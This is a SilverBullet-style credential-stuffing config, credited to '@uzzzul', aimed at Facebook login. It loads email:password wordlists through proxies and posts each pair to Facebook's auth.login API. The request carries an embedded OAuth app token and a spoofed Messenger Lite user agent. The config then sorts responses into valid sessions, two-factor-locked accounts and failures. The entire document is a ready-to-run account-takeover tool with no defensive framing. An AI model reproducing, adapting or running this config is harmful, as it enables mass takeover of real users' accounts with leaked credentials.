[SETTINGS]
{
  "Name": "facebook",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-01-06T17:51:17.1791955+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "facebook",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#GET REQUEST GET "https://www.facebook.com/" 
  
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: www.facebook.com" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 

#PMT PARSE "<SOURCE>" LR "action=\"/login/?privacy_mutation_token=" "\"" -> VAR "PMT" 

#JAB PARSE "<SOURCE>" LR "\"><input type=\"hidden\" name=\"jazoest\" value=\"" "\"" -> VAR "JAB" 

#lsd PARSE "<SOURCE>" LR " name=\"lsd\" value=\"" "\"" -> VAR "lsd" 

#get REQUEST GET "https://www.facebook.com/login/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#lgndim PARSE "<SOURCE>" LR "name=\"lgndim\" value=\"" "\"" -> VAR "lgnjs" 

#lgnjs PARSE "<SOURCE>" LR "name=\"lgnjs\" value=\"" "\"" -> VAR "lgnjs" 

#login REQUEST POST "https://b-api.facebook.com/method/auth.login" 
  CONTENT "email=<USER>&password=<PASS>&credentials_type=password&error_detail_type=button_with_disabled&format=json&device_id=cdc4558c-4dd4-4fd0-9ba6-d09e0223d5e5&generate_session_cookies=1&generate_analytics_claim=1&generate_machine_id=1&method=auth.login" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "authority: b-api.facebook.com" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "authorization: OAuth 200424423651082|2a9918c6bcd75b94cefcbb5635c6ad16" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko) [FBAN/MessengerLite;FBAV/115.0.0.2.114;FBPN/com.facebook.mlite;FBLC/ar_EG;FBBV/257412622;FBCR/Orange - STAY SAFE;FBMF/Xiaomi;FBBD/xiaomi;FBDV/Redmi 7;FBSV/9;FBCA/arm64-v8a:null;FBDM/{density=2.0,width=720,height=1369};]" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "session_key" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "User must verify their account on www.facebook.com" 
    KEY "405" 
    KEY "(405)" 
  KEYCHAIN Failure OR 
    KEY "Invalid username or password " 
    KEY "401" 
    KEY "(401)" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "User must confirm their e-mail address on www.facebook.com" 
    KEY "407" 
    KEY "(407)" 

#configby FUNCTION Constant "@uzzzul" -> CAP "configby" 

